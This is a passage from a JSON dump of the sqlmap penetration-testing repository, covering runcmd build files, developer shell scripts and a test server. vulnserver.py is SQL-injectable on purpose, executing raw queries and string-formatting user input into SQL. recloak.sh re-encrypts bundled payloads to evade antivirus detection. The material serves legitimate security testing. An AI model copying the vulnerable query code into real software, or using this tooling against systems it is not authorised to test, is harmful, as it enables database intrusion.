\tName=\"VCWebDeploymentTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPostBuildEventTool\"\r\n\t\t\t/>\r\n\t\t</Configuration>\r\n\t</Configurations>\r\n\t<References>\r\n\t</References>\r\n\t<Files>\r\n\t\t<Filter\r\n\t\t\tName=\"Source Files\"\r\n\t\t\tFilter=\"cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\"\r\n\t\t\tUniqueIdentifier=\"{4FC737F1-C7A5-4376-A066-2A32D752A2FF}\"\r\n\t\t\t>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\runcmd.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\stdafx.cpp\"\r\n\t\t\t\t>\r\n\t\t\t\t<FileConfiguration\r\n\t\t\t\t\tName=\"Debug|Win32\"\r\n\t\t\t\t\t>\r\n\t\t\t\t\t<Tool\r\n\t\t\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\t\t\tUsePrecompiledHeader=\"1\"\r\n\t\t\t\t\t/>\r\n\t\t\t\t</FileConfiguration>\r\n\t\t\t\t<FileConfiguration\r\n\t\t\t\t\tName=\"Release|Win32\"\r\n\t\t\t\t\t>\r\n\t\t\t\t\t<Tool\r\n\t\t\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\t\t\tUsePrecompiledHeader=\"1\"\r\n\t\t\t\t\t/>\r\n\t\t\t\t</FileConfiguration>\r\n\t\t\t</File>\r\n\t\t</Filter>\r\n\t\t<Filter\r\n\t\t\tName=\"Header Files\"\r\n\t\t\tFilter=\"h;hpp;hxx;hm;inl;inc;xsd\"\r\n\t\t\tUniqueIdentifier=\"{93995380-89BD-4b04-88EB-625FBE52EBFB}\"\r\n\t\t\t>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\stdafx.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t</Filter>\r\n\t\t<Filter\r\n\t\t\tName=\"Resource Files\"\r\n\t\t\tFilter=\"rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav\"\r\n\t\t\tUniqueIdentifier=\"{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\"\r\n\t\t\t>\r\n\t\t</Filter>\r\n\t\t<File\r\n\t\t\tRelativePath=\".\\ReadMe.txt\"\r\n\t\t\t>\r\n\t\t</File>\r\n\t</Files>\r\n\t<Globals>\r\n\t</Globals>\r\n</VisualStudioProject>\r\n"
  },
  {
    "path": "sqlmap/extra/runcmd/src/runcmd/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\r\n// runcmd.pch will be the pre-compiled header\r\n// stdafx.obj will contain the pre-compiled type information\r\n\r\n#include \"stdafx.h\"\r\n\r\n// TODO: reference any additional headers you need in STDAFX.H\r\n// and not in this file\r\n"
  },
  {
    "path": "sqlmap/extra/runcmd/src/runcmd/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\r\n// or project specific include files that are used frequently, but\r\n// are changed infrequently\r\n//\r\n\r\n#pragma once\r\n\r\n#ifndef _WIN32_WINNT\t\t// Allow use of features specific to Windows XP or later.                   \r\n#define _WIN32_WINNT 0x0501\t// Change this to the appropriate value to target other versions of Windows.\r\n#endif\t\t\t\t\t\t\r\n\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n\r\n\r\n\r\n// TODO: reference additional headers your program requires here\r\n"
  },
  {
    "path": "sqlmap/extra/runcmd/src/runcmd.sln",
    "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 9.00\r\n# Visual Studio 2005\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"runcmd\", \"runcmd\\runcmd.vcproj\", \"{1C6185A9-871A-4F6E-9B2D-BE4399479784}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|Win32 = Debug|Win32\r\n\t\tRelease|Win32 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32\r\n\t\t{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32\r\n\t\t{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32\r\n\t\t{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "sqlmap/extra/shellcodeexec/README.txt",
    "content": "Binary files in this folder are data files used by sqlmap on the target\nsystem, but not executed on the system running sqlmap. They are licensed\nunder the terms of the GNU Lesser General Public License and their source\ncode is available on https://github.com/inquisb/shellcodeexec.\n"
  },
  {
    "path": "sqlmap/extra/shutils/autocompletion.sh",
    "content": "#/usr/bin/env bash\n\n# source ./extra/shutils/autocompletion.sh\n\nDIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" >/dev/null 2>&1 && pwd )\"\nWORDLIST=`python \"$DIR/../../sqlmap.py\" -hh | grep -Eo '\\s\\--?\\w[^ =,]*' | grep -vF '..' | paste -sd \"\" -`\n\ncomplete -W \"$WORDLIST\" sqlmap\ncomplete -W \"$WORDLIST\" ./sqlmap.py\n"
  },
  {
    "path": "sqlmap/extra/shutils/blanks.sh",
    "content": "#!/bin/bash\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# Removes trailing spaces from blank lines inside project files\nfind . -type f -iname '*.py' -exec sed -i 's/^[ \\t]*$//' {} \\;\n"
  },
  {
    "path": "sqlmap/extra/shutils/drei.sh",
    "content": "#!/bin/bash\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# Stress test against Python3\n\nexport SQLMAP_DREI=1\n#for i in $(find . -iname \"*.py\" | grep -v __init__); do python3 -c 'import '`echo $i | cut -d '.' -f 2 | cut -d '/' -f 2- | sed 's/\\//./g'`''; done\nfor i in $(find . -iname \"*.py\" | grep -v __init__); do PYTHONWARNINGS=all python3 -m compileall $i | sed 's/Compiling/Checking/g'; done\nunset SQLMAP_DREI\nsource `dirname \"$0\"`\"/junk.sh\"\n\n# for i in $(find . -iname \"*.py\" | grep -v __init__); do timeout 10 pylint --py3k $i; done 2>&1 | grep -v -E 'absolute_import|No config file'\n"
  },
  {
    "path": "sqlmap/extra/shutils/duplicates.py",
    "content": "#!/usr/bin/env python\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# Removes duplicate entries in wordlist like files\n\nfrom __future__ import print_function\n\nimport sys\n\nif __name__ == \"__main__\":\n    if len(sys.argv) > 1:\n        items = list()\n\n        with open(sys.argv[1], 'r') as f:\n            for item in f:\n                item = item.strip()\n                try:\n                    str.encode(item)\n                    if item in items:\n                        if item:\n                            print(item)\n                    else:\n                        items.append(item)\n                except:\n                    pass\n\n        with open(sys.argv[1], 'w+') as f:\n            f.writelines(\"\\n\".join(items))\n"
  },
  {
    "path": "sqlmap/extra/shutils/junk.sh",
    "content": "#!/bin/bash\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\nfind . -type d -name \"__pycache__\" -exec rm -rf {} \\; &>/dev/null\nfind . -name \"*.pyc\" -exec rm -f {} \\; &>/dev/null\n"
  },
  {
    "path": "sqlmap/extra/shutils/modernize.sh",
    "content": "#!/bin/bash\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# sudo pip install modernize\n\nfor i in $(find . -iname \"*.py\" | grep -v __init__); do python-modernize $i 2>&1 | grep -E '^[+-]' | grep -v range | grep -v absolute_import; done\n"
  },
  {
    "path": "sqlmap/extra/shutils/newlines.py",
    "content": "#! /usr/bin/env python\n\nfrom __future__ import print_function\n\nimport os\nimport sys\n\ndef check(filepath):\n    if filepath.endswith(\".py\"):\n        content = open(filepath, \"rb\").read()\n        pattern = \"\\n\\n\\n\".encode(\"ascii\")\n\n        if pattern in content:\n            index = content.find(pattern)\n            print(filepath, repr(content[index - 30:index + 30]))\n\nif __name__ == \"__main__\":\n    try:\n        BASE_DIRECTORY = sys.argv[1]\n    except IndexError:\n        print(\"no directory specified, defaulting to current working directory\")\n        BASE_DIRECTORY = os.getcwd()\n\n    print(\"looking for *.py scripts in subdirectories of '%s'\" % BASE_DIRECTORY)\n    for root, dirs, files in os.walk(BASE_DIRECTORY):\n        if any(_ in root for _ in (\"extra\", \"thirdparty\")):\n            continue\n        for name in files:\n            filepath = os.path.join(root, name)\n            check(filepath)\n"
  },
  {
    "path": "sqlmap/extra/shutils/postcommit-hook.sh",
    "content": "#!/bin/bash\n\n: '\ncat > .git/hooks/post-commit << EOF\n#!/bin/bash\n\nsource ./extra/shutils/postcommit-hook.sh\nEOF\n\nchmod +x .git/hooks/post-commit\n'\n\nSETTINGS=\"../../lib/core/settings.py\"\nPYPI=\"../../extra/shutils/pypi.sh\"\n\ndeclare -x SCRIPTPATH=\"${0}\"\n\nFULLPATH=${SCRIPTPATH%/*}/$SETTINGS\n\nif [ -f $FULLPATH ]\nthen\n    LINE=$(grep -o ${FULLPATH} -e 'VERSION = \"[0-9.]*\"')\n    declare -a LINE\n    NEW_TAG=$(python -c \"import re, sys, time; version = re.search('\\\"([0-9.]*)\\\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''\" \"$LINE\")\n    if [ -n \"$NEW_TAG\" ]\n    then\n        #git commit -am \"Automatic monthly tagging\"\n        echo \"Creating new tag ${NEW_TAG}\"\n        git tag $NEW_TAG\n        git push origin $NEW_TAG\n        echo \"Going to push PyPI package\"\n        /bin/bash ${SCRIPTPATH%/*}/$PYPI\n    fi\nfi\n"
  },
  {
    "path": "sqlmap/extra/shutils/precommit-hook.sh",
    "content": "#!/bin/bash\n\n: '\ncat > .git/hooks/pre-commit << EOF\n#!/bin/bash\n\nsource ./extra/shutils/precommit-hook.sh\nEOF\n\nchmod +x .git/hooks/pre-commit\n'\n\nPROJECT=\"../../\"\nSETTINGS=\"../../lib/core/settings.py\"\n\ndeclare -x SCRIPTPATH=\"${0}\"\n\nPROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT\nSETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS\n\ngit diff $SETTINGS_FULLPATH | grep \"VERSION =\" > /dev/null && exit 0\n\nif [ -f $SETTINGS_FULLPATH ]\nthen\n    LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = \"[0-9.]*\"')\n    declare -a LINE\n    INCREMENTED=$(python -c \"import re, sys, time; version = re.search('\\\"([0-9.]*)\\\"', sys.argv[1]).group(1); _ = version.split('.'); _.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))\" \"$LINE\")\n    if [ -n \"$INCREMENTED\" ]\n    then\n        sed -i \"s/${LINE}/${INCREMENTED}/\" $SETTINGS_FULLPATH\n        echo \"Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}\"\n    else\n        echo \"Something went wrong in VERSION increment\"\n        exit 1\n    fi\n    git add \"$SETTINGS_FULLPATH\"\nfi\n"
  },
  {
    "path": "sqlmap/extra/shutils/pycodestyle.sh",
    "content": "#!/bin/bash\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)\nfind . -wholename \"./thirdparty\" -prune -o -type f -iname \"*.py\" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \\;\n"
  },
  {
    "path": "sqlmap/extra/shutils/pydiatra.sh",
    "content": "#!/bin/bash\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# Runs py3diatra on all python files (prerequisite: pip install pydiatra)\nfind . -wholename \"./thirdparty\" -prune -o -type f -iname \"*.py\" -exec py3diatra '{}' \\; | grep -v bare-except\n"
  },
  {
    "path": "sqlmap/extra/shutils/pyflakes.sh",
    "content": "#!/bin/bash\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)\nfind . -wholename \"./thirdparty\" -prune -o -type f -iname \"*.py\" -exec pyflakes3 '{}' \\; | grep -v \"redefines '_'\"\n"
  },
  {
    "path": "sqlmap/extra/shutils/pylint.sh",
    "content": "#!/bin/bash\n\n# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\nfind . -wholename \"./thirdparty\" -prune -o -type f -iname \"*.py\" -exec pylint --rcfile=./.pylintrc '{}' \\;\n"
  },
  {
    "path": "sqlmap/extra/shutils/pypi.sh",
    "content": "#!/bin/bash\n\nif [ ! -f ~/.pypirc ]; then\n    echo \"File ~/.pypirc is missing\"\n    exit 1\nfi\n\ndeclare -x SCRIPTPATH=\"${0}\"\nSETTINGS=\"${SCRIPTPATH%/*}/../../lib/core/settings.py\"\nVERSION=$(cat $SETTINGS | grep -E \"^VERSION =\" | cut -d '\"' -f 2 | cut -d '.' -f 1-3)\nTYPE=pip\nTMP_DIR=/tmp/pypi\nmkdir $TMP_DIR\ncd $TMP_DIR\ncat > $TMP_DIR/setup.py << EOF\n#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom setuptools import setup, find_packages\n\nsetup(\n    name='sqlmap',\n    version='$VERSION',\n    description='Automatic SQL injection and database takeover tool',\n    long_description=open('README.rst').read(),\n    long_description_content_type='text/x-rst',\n    author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar',\n    author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',\n    url='https://sqlmap.org',\n    project_urls={\n        'Documentation': 'https://github.com/sqlmapproject/sqlmap/wiki',\n        'Source': 'https://github.com/sqlmapproject/sqlmap/',\n        'Tracker': 'https://github.com/sqlmapproject/sqlmap/issues',\n    },\n    download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',\n    license='GNU General Public License v2 (GPLv2)',\n    packages=find_packages(),\n    include_package_data=True,\n    zip_safe=False,\n    # https://pypi.python.org/pypi?%3Aaction=list_classifiers\n    classifiers=[\n        'Development Status :: 5 - Production/Stable',\n        'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',\n        'Natural Language :: English',\n        'Operating System :: OS Independent',\n        'Programming Language :: Python',\n        'Environment :: Console',\n        'Topic :: Database',\n        'Topic :: Security',\n    ],\n    entry_points={\n        'console_scripts': [\n            'sqlmap = sqlmap.sqlmap:main',\n        ],\n    },\n)\nEOF\nwget \"https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip\" -O sqlmap.zip\nunzip sqlmap.zip\nrm sqlmap.zip\nmv \"sqlmap-$VERSION\" sqlmap\ncat > sqlmap/__init__.py << EOF\n#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport sys\n\nsys.dont_write_bytecode = True\nsys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))\nEOF\ncat > README.rst << \"EOF\"\nsqlmap\n======\n\n|Python 2.6|2.7|3.x| |License| |Twitter|\n\nsqlmap is an open source penetration testing tool that automates the\nprocess of detecting and exploiting SQL injection flaws and taking over\nof database servers. It comes with a powerful detection engine, many\nniche features for the ultimate penetration tester and a broad range of\nswitches lasting from database fingerprinting, over data fetching from\nthe database, to accessing the underlying file system and executing\ncommands on the operating system via out-of-band connections.\n\nScreenshots\n-----------\n\n.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png\n   :alt: Screenshot\n\n\nYou can visit the `collection of\nscreenshots <https://github.com/sqlmapproject/sqlmap/wiki/Screenshots>`__\ndemonstrating some of features on the wiki.\n\nInstallation\n------------\n\nYou can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: ::\n\n    pip install --upgrade sqlmap\n\nAlternatively, you can download the latest tarball by clicking\n`here <https://github.com/sqlmapproject/sqlmap/tarball/master>`__ or\nlatest zipball by clicking\n`here <https://github.com/sqlmapproject/sqlmap/zipball/master>`__.\n\nIf you prefer fetching daily updates, you can download sqlmap by cloning the\n`Git <https://github.com/sqlmapproject/sqlmap>`__ repository:\n\n::\n\n    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev\n\nsqlmap works out of the box with\n`Python <http://www.python.org/download/>`__ version **2.6**, **2.7** and\n**3.x** on any platform.\n\nUsage\n-----\n\nTo get a list of basic options and switches use:\n\n::\n\n    sqlmap -h\n\nTo get a list of all options and switches use:\n\n::\n\n    sqlmap -hh\n\nYou can find a sample run `here <https://asciinema.org/a/46601>`__. To\nget an overview of sqlmap capabilities, list of supported features and\ndescription of all options and switches, along with examples, you are\nadvised to consult the `user's\nmanual <https://github.com/sqlmapproject/sqlmap/wiki/Usage>`__.\n\nLinks\n-----\n\n-  Homepage: https://sqlmap.org\n-  Download:\n   `.tar.gz <https://github.com/sqlmapproject/sqlmap/tarball/master>`__\n   or `.zip <https://github.com/sqlmapproject/sqlmap/zipball/master>`__\n-  Commits RSS feed:\n   https://github.com/sqlmapproject/sqlmap/commits/master.atom\n-  Issue tracker: https://github.com/sqlmapproject/sqlmap/issues\n-  User's manual: https://github.com/sqlmapproject/sqlmap/wiki\n-  Frequently Asked Questions (FAQ):\n   https://github.com/sqlmapproject/sqlmap/wiki/FAQ\n-  Twitter: https://twitter.com/sqlmap\n-  Demos: http://www.youtube.com/user/inquisb/videos\n-  Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots\n\n.. |Python 2.6|2.7|3.x| image:: https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg\n   :target: https://www.python.org/\n.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg\n   :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE\n.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg\n   :target: https://twitter.com/sqlmap\n\n.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md\n.. http://rst.ninjs.org/\nEOF\nsed -i \"s/^VERSION =.*/VERSION = \\\"$VERSION\\\"/g\" sqlmap/lib/core/settings.py\nsed -i \"s/^TYPE =.*/TYPE = \\\"$TYPE\\\"/g\" sqlmap/lib/core/settings.py\nfor file in $(find sqlmap -type f | grep -v -E \"\\.(git|yml)\"); do echo include $file >> MANIFEST.in; done\npython setup.py sdist upload\nrm -rf $TMP_DIR\n"
  },
  {
    "path": "sqlmap/extra/shutils/recloak.sh",
    "content": "#!/bin/bash\n\n# NOTE: this script is for dev usage after AV something something\n\nDIR=$(cd -P -- \"$(dirname -- \"${BASH_SOURCE[0]}\")\" && pwd -P)\n\ncd $DIR/../..\nfor file in $(find -regex \".*\\.[a-z]*_\" -type f | grep -v wordlist); do python extra/cloak/cloak.py -d -i $file; done\n\ncd $DIR/../cloak\nsed -i 's/KEY = .*/KEY = b\"'`python -c 'import random; import string; print(\"\".join(random.sample(string.ascii_letters + string.digits, 16)))'`'\"/g' cloak.py\n\ncd $DIR/../..\nfor file in $(find -regex \".*\\.[a-z]*_\" -type f | grep -v wordlist); do python extra/cloak/cloak.py -i `echo $file | sed 's/_$//g'`; done\n\ngit clean -f > /dev/null\n"
  },
  {
    "path": "sqlmap/extra/shutils/strip.sh",
    "content": "#!/bin/bash\n\n# References:   http://www.thegeekstuff.com/2012/09/strip-command-examples/\n#               http://www.muppetlabs.com/~breadbox/software/elfkickers.html\n#               https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html\n\n# https://github.com/BR903/ELFkickers/tree/master/sstrip\n# https://www.ubuntuupdates.org/package/core/cosmic/universe/updates/postgresql-server-dev-10\n\n# For example:\n# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_\n# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so\n# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so\n# rm lib_postgresqludf_sys.so\n\nstrip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $*\nsstrip $*\n\n"
  },
  {
    "path": "sqlmap/extra/vulnserver/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/extra/vulnserver/vulnserver.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nvulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)\n\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport base64\nimport json\nimport re\nimport sqlite3\nimport sys\nimport threading\nimport traceback\n\nPY3 = sys.version_info >= (3, 0)\nUNICODE_ENCODING = \"utf-8\"\nDEBUG = False\n\nif PY3:\n    from http.client import INTERNAL_SERVER_ERROR\n    from http.client import NOT_FOUND\n    from http.client import OK\n    from http.server import BaseHTTPRequestHandler\n    from http.server import HTTPServer\n    from socketserver import ThreadingMixIn\n    from urllib.parse import parse_qs\n    from urllib.parse import unquote_plus\nelse:\n    from BaseHTTPServer import BaseHTTPRequestHandler\n    from BaseHTTPServer import HTTPServer\n    from httplib import INTERNAL_SERVER_ERROR\n    from httplib import NOT_FOUND\n    from httplib import OK\n    from SocketServer import ThreadingMixIn\n    from urlparse import parse_qs\n    from urllib import unquote_plus\n\nSCHEMA = \"\"\"\n    CREATE TABLE users (\n        id INTEGER,\n        name TEXT,\n        surname TEXT\n    );\n    INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');\n    INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');\n    INSERT INTO users (id, name, surname) VALUES (3, 'wu', '179ad45c6ce2cb97cf1029e212046e81');\n    INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (https://sqlmap.org)', 'user agent header');\n    INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');\n\"\"\"\n\nLISTEN_ADDRESS = \"localhost\"\nLISTEN_PORT = 8440\n\n_conn = None\n_cursor = None\n_lock = None\n_server = None\n_alive = False\n\ndef init(quiet=False):\n    global _conn\n    global _cursor\n    global _lock\n\n    _conn = sqlite3.connect(\":memory:\", isolation_level=None, check_same_thread=False)\n    _cursor = _conn.cursor()\n    _lock = threading.Lock()\n\n    _cursor.executescript(SCHEMA)\n\n    if quiet:\n        global print\n\n        def _(*args, **kwargs):\n            pass\n\n        print = _\n\nclass ThreadingServer(ThreadingMixIn, HTTPServer):\n    def finish_request(self, *args, **kwargs):\n        try:\n            HTTPServer.finish_request(self, *args, **kwargs)\n        except Exception:\n            if DEBUG:\n                traceback.print_exc()\n\nclass ReqHandler(BaseHTTPRequestHandler):\n    def do_REQUEST(self):\n        path, query = self.path.split('?', 1) if '?' in self.path else (self.path, \"\")\n        params = {}\n\n        if query:\n            params.update(parse_qs(query))\n\n            if \"<script>\" in unquote_plus(query):\n                self.send_response(INTERNAL_SERVER_ERROR)\n                self.send_header(\"X-Powered-By\", \"Express\")\n                self.send_header(\"Connection\", \"close\")\n                self.end_headers()\n                self.wfile.write(\"CLOUDFLARE_ERROR_500S_BOX\".encode(UNICODE_ENCODING))\n                return\n\n        if hasattr(self, \"data\"):\n            if self.data.startswith('{') and self.data.endswith('}'):\n                params.update(json.loads(self.data))\n            elif self.data.startswith('<') and self.data.endswith('>'):\n                params.update(dict((_[0], _[1].replace(\"&apos;\", \"'\").replace(\"&quot;\", '\"').replace(\"&lt;\", '<').replace(\"&gt;\", '>').replace(\"&amp;\", '&')) for _ in re.findall(r'name=\"([^\"]+)\" value=\"([^\"]*)\"', self.data)))\n            else:\n                self.data = self.data.replace(';', '&')     # Note: seems that Python3 started ignoring parameter splitting with ';'\n                params.update(parse_qs(self.data))\n\n        for name in self.headers:\n            params[name.lower()] = self.headers[name]\n\n        if \"cookie\" in params:\n            for part in params[\"cookie\"].split(';'):\n                part = part.strip()\n                if '=' in part:\n                    name, value = part.split('=', 1)\n                    params[name.strip()] = unquote_plus(value.strip())\n\n        for key in params:\n            if params[key] and isinstance(params[key], (tuple, list)):\n                params[key] = params[key][-1]\n\n        self.url, self.params = path, params\n\n        if self.url == '/':\n            if not any(_ in self.params for _ in (\"id\", \"query\")):\n                self.send_response(OK)\n                self.send_header(\"Content-type\", \"text/html; charset=%s\" % UNICODE_ENCODING)\n                self.send_header(\"Connection\", \"close\")\n                self.end_headers()\n                self.wfile.write(b\"<!DOCTYPE html><html><head><title>vulnserver</title></head><body><h3>GET:</h3><a href='/?id=1'>link</a><hr><h3>POST:</h3><form method='post'>ID: <input type='text' name='id'><input type='submit' value='Submit'></form></body></html>\")\n            else:\n                code, output = OK, \"\"\n\n                try:\n                    if self.params.get(\"echo\", \"\"):\n                        output += \"%s<br>\" % self.params[\"echo\"]\n\n                    if self.params.get(\"reflect\", \"\"):\n                        output += \"%s<br>\" % self.params.get(\"id\")\n\n                    with _lock:\n                        if \"query\" in self.params:\n                            _cursor.execute(self.params[\"query\"])\n                        elif \"id\" in self.params:\n                            if \"base64\" in self.params:\n                                _cursor.execute(\"SELECT * FROM users WHERE id=%s LIMIT 0, 1\" % base64.b64decode(\"%s===\" % self.params[\"id\"], altchars=self.params.get(\"altchars\")).decode())\n                            else:\n                                _cursor.execute(\"SELECT * FROM users WHERE id=%s LIMIT 0, 1\" % self.params[\"id\"])\n                        results = _cursor.fetchall()\n\n                    output += \"<b>SQL results:</b><br>\\n\"\n\n                    if self.params.get(\"code\", \"\"):\n                        if not results:\n                            code = INTERNAL_SERVER_ERROR\n                    else:\n                        if results:\n                            output += \"<table border=\\\"1\\\">\\n\"\n\n                            for row in results:\n                                output += \"<tr>\"\n                                for value in row:\n                                    output += \"<td>%s</td>\" % value\n                                output += \"</tr>\\n\"\n\n                            output += \"</table>\\n\"\n                        else:\n                            output += \"no results found\"\n\n                    output += \"</body></html>\"\n                except Exception as ex:\n                    code = INTERNAL_SERVER_ERROR\n                    output = \"%s: %s\" % (re.search(r\"'([^']+)'\", str(type(ex))).group(1), ex)\n\n                self.send_response(code)\n\n                self.send_header(\"Content-type\", \"text/html\")\n                self.send_header(\"Connection\", \"close\")\n\n                if self.raw_requestline.startswith(b\"HEAD\"):\n                    self.send_header(\"Content-Length\", str(len(output)))\n                    self.end_headers()\n                else:\n                    self.end_headers()\n                    self.wfile.write(output if isinstance(output, bytes) else output.encode(UNICODE_ENCODING))\n        else:\n            self.send_response(NOT_FOUND)\n            self.send_header(\"Connection\", \"close\")\n            self.end_headers()\n\n    def do_GET(self):\n        self.do_REQUEST()\n\n    def do_PUT(self):\n        self.do_POST()\n\n    def do_HEAD(self):\n        self.do_REQUEST()\n\n    def do_POST(self):\n        length = int(self.headers.get(\"Content-length\", 0))\n        if length:\n            data = self.rfile.read(length)\n            data = unquote_plus(data.decode(UNICODE_ENCODING, \"ignore\"))\n            self.data = data\n        elif self.headers.get(\"Transfer-encoding\") == \"chunked\":\n            data, line = b\"\", b\"\"\n            count = 0\n\n            while True:\n                line += self.rfile.read(1)\n                if line.endswith(b'\\n'):\n                    if count % 2 == 1:\n                        current = line.rstrip(b\"\\r\\n\")\n                        if not current:\n                            break\n                        else:\n                            data += current\n\n                    count += 1\n                    line = b\"\"\n\n            self.data = data.decode(UNICODE_ENCODING, \"ignore\")\n\n        self.do_REQUEST()\n\n    def log_message(self, format, *args):\n        return\n\ndef run(address=LISTEN_ADDRESS, port=LISTEN_PORT):\n    global _alive\n    global _server\n    try:\n        _alive = True\n        _server = ThreadingServer((address, port), ReqHandler)\n        print(\"[i] running HTTP server at 'http://%s:%d'\" % (address, port))\n        _server.serve_forever()\n    except KeyboardInterrupt:\n        _server.socket.close()\n        raise\n    finally:\n        _alive = False\n\nif __name__ == \"__main__\":\n    try:\n        init()\n        run(sys.argv[1] if len(sys.argv) > 1 else LISTEN_ADDRESS, int(sys.argv[2] if len(sys.argv) > 2 else LISTEN_PORT))\n    except KeyboardInterrupt:\n        print(\"\\r[x] Ctrl-C received\")\n"
  },
  {
    "path": "sqlmap/lib/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/controller/__init__.py",
